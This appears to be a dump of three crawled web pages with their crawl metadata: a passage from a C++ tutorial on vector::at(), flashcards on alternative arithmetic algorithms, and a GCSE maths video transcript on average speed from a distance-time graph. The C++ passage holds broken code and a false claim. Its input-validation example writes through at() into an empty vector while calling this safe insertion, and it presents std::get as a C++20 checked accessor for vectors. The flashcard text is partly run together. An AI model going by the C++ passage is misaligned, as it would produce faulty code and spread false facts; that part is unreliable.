sorted.\n\n## Comparisons and Logic with at()\n\nThe at() function is also invaluable for comparisons and conditional logic dealing with vectors:\n\n### Searching a Vector\n\nWe can search for an element in a vector using at() like so:\n\n``````std::vector<int> vec {15, 20, 7, 8};\nint searchNum = 8;\n\nfor (int i = 0; i < vec.size(); i++) {\nif (vec.at(i) == searchNum) {\nstd::cout << searchNum << \" found!\\n\";\nbreak;\n}\n}``````\n\nThis loops through comparing each element to the search number until found.\n\nWe could expand this to a binary search for improved O(log N) performance on a sorted vector.\n\n### Conditional Logic on Elements\n\nMore complex conditional logic is also possible:\n\n``````std::vector<Person> people {/*...*/};\n\n//find teenagers\nfor (int i = 0; i < people.size(); i++) {\nPerson p = people.at(i);\nif (p.age >= 13 && p.age <= 19) {\nstd::cout << p.name << \" is a teenager\\n\";\n}\n}``````\n\nHere we check each Person‘s age using at() and some multi-condition logic to filter teenagers.\n\n### Validating Input\n\nWe can also leverage at() when validating user input being inserted into a vector:\n\n``````std::vector<int> userInput;\n\n//prompt for numbers\nfor (int i = 0; i < 5; i++) {\n\nint input;\nstd::cin >> input;\n\n//validate input is > 0\nif (input <= 0) {\nstd::cout << \"Invalid number, try again.\\n\";\n} else {\nuserInput.at(i) = input;\n}\n\n}``````\n\nThis validates each input before safely inserting into the vector using at().\n\n## Passing Elements to Functions\n\nWhen passing elements to functions, at() provides bounds checking:\n\n``````//function that prints passed object\ntemplate <typename T>\nvoid printElement(const T& obj) {\nstd::cout << obj << \"\\n\";\n}\n\nstd::vector<std::string> names {\"Sarah\", \"Ahmed\", \"Lucy\"};\n\nprintElement(names.at(0)); //print first element``````\n\nSince printElement takes a reference, no copying occurs. But at() still ensures we only pass valid in-bounds elements.\n\nFor passing an entire vector, we typically pass by reference:\n\n``````void printVector(const std::vector<int>& vec) {/*...*/}\n\nstd::vector<int> myVec {1, 2, 3};\nprintVector(myVec); //pass by reference ``````\n\nThis avoids copying the entire vector while allowing the function to access it.\n\n## Handling Errors and Exceptions\n\nA key advantage of at() is its bounds checking enables exceptions to handle errors:\n\n``````std::vector<std::string> names {\"Sarah\", \"Lucy\"};\n\ntry {\n\nstd::string first = names.at(100); //out of bounds!\n\n} catch (const std::out_of_range& e) {\n\n//handle error\nstd::cout << \"Index out of range!\\n\";\n\n}``````\n\nWhen at() results in an invalid index, it will throw a std::out_of_range exception that can be caught. We can then print an error, log it, or recover as needed.\n\nThis is far better than vector[] access, which has undefined behavior on invalid indices.\n\nSome best practices for exceptions with at():\n\n• Catch by const reference to avoid copying\n• Print error context in catch block\n• Only handle expected errors – let unknown bubble up\n• Use error codes and enums rather than strings\n• Document exceptions thrown in functions\n\nProper use of try/catch blocks prevents crashes when using at() with vectors.\n\n## Performance Considerations\n\nThe at() function provides safety via bounds checking – but this comes at a performance cost.\n\nEach call to at() must check if the passed index is valid. This adds overhead compared to [] access which is unchecked.\n\nSome benchmarks on modern hardware show at() being ~2-3x slower than [] for vector access.\n\nSo in performance-critical sections of code, [] may be preferred if you can guarantee index validity yourself. Some other optimizations like:\n\n• Reserving vector capacity ahead of time to prevent reallocation\n• Using iterators rather than index access\n• Improving algorithm complexity to do fewer checks\n• Using multithreading to parallelize independent checks\n\nBut for most code, favor using at() for its safety and resilience against bugs. Optimize after identifying performance bottlenecks.\n\n## Alternatives to at() for Vector Access\n\nThe at() function provides an excellent combination of readability, safety, and performance. However, there are alternatives:\n\n• Iterator access – STL iterators allow sequential or random access without managing indices directly.\n• Ranged for loops – Clean syntax for looping through elements:\n\n``````for (string str : stringVector) {\n//do something\n}``````\n• Front/back – Access first and last elements via .front() / .back().\n• std::get – Newer checked access function in C++20:\n\n``std::get<int>(vec, 1); //safe checked access``\n• Stack/heap vectors – Stack vectors can avoid allocations but are fixed size.\n\nEach approach has trade-offs. But for direct access by index, at() provides the best combination of safety and performance in most cases.\n\n## In Summary\n\nThis deep dive covered everything you need to know to leverage C++ vector‘s at() function effectively:" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74602735,"math_prob":0.88233143,"size":10865,"snap":"2023-40-2023-50","text_gpt3_token_len":2593,"char_repetition_ratio":0.1288095,"word_repetition_ratio":0.022611644,"special_character_ratio":0.26562357,"punctuation_ratio":0.16674517,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9833797,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-11T16:02:06Z\",\"WARC-Record-ID\":\"<urn:uuid:853d0702-82d1-42bf-b9f6-4857305a46bc>\",\"Content-Length\":\"169006\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bc964c76-e9df-48c9-9233-a4943e351e83>\",\"WARC-Concurrent-To\":\"<urn:uuid:c3c7db18-12f3-4ab3-ba4d-0a18996cbb6d>\",\"WARC-IP-Address\":\"104.21.36.195\",\"WARC-Target-URI\":\"https://thelinuxcode.com/at-functions-cpp-vector/\",\"WARC-Payload-Digest\":\"sha1:2QEGMWUOUR7VODCJFO7GFTCOT63H2DCO\",\"WARC-Block-Digest\":\"sha1:N5PLL45NSTF52VIXLHOITA5OWKH6NILO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679515260.97_warc_CC-MAIN-20231211143258-20231211173258-00474.warc.gz\"}"}
https://www.flashcardmachine.com/alternative-algorithms.html
[ "# Shared Flashcard Set\n\n## Details\n\nAlternative Algorithms\nEXAM 2\n15\nMathematics\n12/08/2010\n\nTerm\n ARTICLE\nDefinition\nTerm\n Partial Sums Algorithm\nDefinition\n [image]\nTerm\n What is the advantage of using the partial-sums algorythm?\nDefinition\n The advantage of this method, for students whohave difficulty with the traditional algorithm, is that mental regrouping is not required; all the partialsums are recorded separately before being combined.   Also, the methodyields a correct sum whether the partial sums beginwith the ones or the left-most column.Left-to-right addition (see figs. 1b and\nTerm\n Scratch Method\nDefinition\n [image]\nTerm\nDefinition\n Students saw an advantage in recording thepartial sums, which does not require them to carrynumbers mentally. Also, this algorithm appeals tostudents’ desire to work quickly because, as theexamples show, they do not have to record all thecomplete partial sums.\nTerm\nDefinition\n [image]   In figure 4, instead of a ten being taken from the6 tens, as would be done in the traditional algorithm,a ten is added to the 5 ones to give 15 ones.To compensate, 1 ten is added to the subtrahend,resulting in 8 tens. The 9 ones are then subtractedfrom the 15 ones. The next step is to add 10 tens tothe 6 tens in the minuend so that 8 tens can be subtracted.To compensate, 1 hundred is added to the 8 hundreds, yielding 9 hundreds. The amount of8 tens is then subtracted from 16 tens. Next, 10 hundredsadded to the 4 hundreds results in 14 hundreds;to compensate, 1 thousand is added to thesubtrahend. Then 9 hundreds can be subtractedfrom 14 hundreds, and 2 thousand is subtractedfrom 5 thousand.\nTerm\n What is an advantage of using the Equal Additions Method of Subtraction?\nDefinition\n The main advantage of this procedureis that it does not rely on one’s skill in regroupingbut on a knowledge of individual addition andsubtraction facts. Equal additions is an interestingoptional method for relating subtraction to addition.\nTerm\n Low stress Subtraction\nDefinition\n [image]   Low-stress subtraction involves renaming theminuend and writing it between the original minuendand the subtrahend before subtracting individualdigits (Hutchings 1975). In figure 5, 6 tens arerenamed as 5 tens and 10 ones; the 10 ones are regrouped with the 5 ones to make 15 ones. Next,because 7 tens cannot be subtracted from 5 tens,4 hundreds is renamed as 3 hundreds and 10 tens;the 10 tens are regrouped with the 5 tens to make15 tens. This process continues until the minuendis rewritten so that no impasses to subtractionremain and the problem is ready to be completed.\nTerm\n Partial products algorythm\nDefinition\n [image]\nTerm\n What is an advantage of using the partial products algorythm?\nDefinition\n The partial-products method does not requiresimultaneous regrouping of addition with multiplication.Teachers can easily assess multiplicationfacts that students consistently miss by examiningpartial products before they are renamed andadded.\nTerm\n Lattice Multiplication\nDefinition\n [image]\nTerm\n Stacking Algorythm for division\nDefinition\n [image]\nTerm\n NOTES\nDefinition\nTerm\n BREAK APART NUMBERS STRATEGY\nDefinition\n Based on place value EXAMPLE: 456 + 20 =(400 + 50 +20 +6)470 + 6 476   Count bys 455 + 10 + 10 455 + 10 = 465 465 + 10 = 475 475 + 1 = 476   Count on 237 + 43 237 + 10 + 10 + 10 + 10 + 1 + 1 +1 247, 257, 267, 277, 278, 279, 280\nSupporting users have an ad free experience!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85708,"math_prob":0.86852795,"size":3280,"snap":"2019-26-2019-30","text_gpt3_token_len":873,"char_repetition_ratio":0.15170941,"word_repetition_ratio":0.07020548,"special_character_ratio":0.264939,"punctuation_ratio":0.09286899,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9889181,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-20T16:16:43Z\",\"WARC-Record-ID\":\"<urn:uuid:5652b85f-a997-4e05-a0ea-bc73e0e0c2cc>\",\"Content-Length\":\"32408\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c94099d0-b2cd-4648-8cae-03c667f3428d>\",\"WARC-Concurrent-To\":\"<urn:uuid:728193e6-a381-4a14-ae58-aaf6a9c725c0>\",\"WARC-IP-Address\":\"67.225.168.77\",\"WARC-Target-URI\":\"https://www.flashcardmachine.com/alternative-algorithms.html\",\"WARC-Payload-Digest\":\"sha1:DT2MYGQH5AXMB5JPE2HWQH5FKTQDNKJI\",\"WARC-Block-Digest\":\"sha1:BYMC4L7OWY6O4L2ZG3NUZEKLOWY6GMA6\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195526536.46_warc_CC-MAIN-20190720153215-20190720175215-00471.warc.gz\"}"}
https://www.nagwa.com/en/videos/695175609529/
[ "# Video: AQA GCSE Mathematics Higher Tier Pack 5 • Paper 1 • Question 24\n\nThis is the distance-time graph for a cyclist cycling 100 metres. a) Calculate the average speed over the 100 metres. Give units in your answer. b) Estimate the distance at which the instantaneous speed is equal to the average speed. You must show your working on the graph.\n\n03:03\n\n### Video Transcript\n\nThis is the distance-time graph for a cyclist cycling 100 metres. Part a) Calculate the average speed over the 100 metres. Give units in your answer. Part b) Estimate the distance at which the instantaneous speed is equal to the average speed. You must show your working on the graph.\n\nRemember speed is a way of measuring the change in distance over a given period of time. The formula for average speed is distance divided by time. So to calculate the average speed for our cyclist, we will need to work out the total distance they travelled and the time it took. In fact, we’re told that the cyclist travelled 100 metres. But we’ll need to read information for the time it took from the graph.\n\nWe can see that the cyclist reached 100 metres at this point. So we can draw a line vertically down to our 𝑥-axis. And we see that it took the cyclist 15 seconds to complete this distance. The speed is therefore found by dividing 100 by 15. This isn’t a calculation we can complete in our heads. So instead, we’ll simplify this fraction as far as we can.\n\n100 and 15 are multiples of five. So we’re going to divide through by five. And we see that this is equivalent to twenty thirds. Now we could leave it in this form or we could change it into a mixed number and therefore into a decimal. 20 divided by three is six remainder two. So we can say that twenty thirds is the same as six and two-thirds. Two-thirds is the same as .6 recurring or .67 correct to two decimal places. So the speed is 6.67 correct to two decimal places.\n\nBut what are the units? Well, we divided a measurement in metres by a measurement in seconds. So the units must be metres per second. And the average speed over the 100 metres was 6.67 metres per second correct to two decimal places. Now let’s look at part b.\n\nWe now know the average speed for the journey. It was 20 over three metres per second. We now need to find a point on the graph, where the gradient is 20 over three since the gradient of a distance-time graph tells us the speed at that point. Since the graph is a curve, we’re going to need to add a tangent with that gradient. Remember the gradient of a straight line is change in 𝑦 over change in 𝑥, which is sometimes called rise over run.\n\nSo we need to find a tangent that rises 20 units for every three units it runs. And we need to be a bit careful with the scale when finding this. Notice that two squares on the 𝑦-axis represent 20 and three squares on the 𝑥-axis represent three. So let’s find a tangent which has this slope. It’s here. The rise of this line is 20 and the run is three. So the gradient is indeed 20 over three. This is at the point where the distance is approximately 68 metres." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.95215386,"math_prob":0.9922198,"size":2707,"snap":"2020-45-2020-50","text_gpt3_token_len":664,"char_repetition_ratio":0.11653718,"word_repetition_ratio":0.013671875,"special_character_ratio":0.23568526,"punctuation_ratio":0.09028961,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99935836,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-24T18:21:41Z\",\"WARC-Record-ID\":\"<urn:uuid:f66a13de-4885-4787-8a15-6ce36359e6dd>\",\"Content-Length\":\"26687\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b97c2db3-bf9a-4093-83e9-1d64e2bc4450>\",\"WARC-Concurrent-To\":\"<urn:uuid:355c388b-5a37-4492-b00d-4d27656e8610>\",\"WARC-IP-Address\":\"23.23.60.1\",\"WARC-Target-URI\":\"https://www.nagwa.com/en/videos/695175609529/\",\"WARC-Payload-Digest\":\"sha1:7AC3S7FHFXY3PGIY5CY3FGFQJUPVKNHL\",\"WARC-Block-Digest\":\"sha1:YROQEVEOXVSW2IXIFUCIU4T7MDAIYGJ4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107884322.44_warc_CC-MAIN-20201024164841-20201024194841-00687.warc.gz\"}"}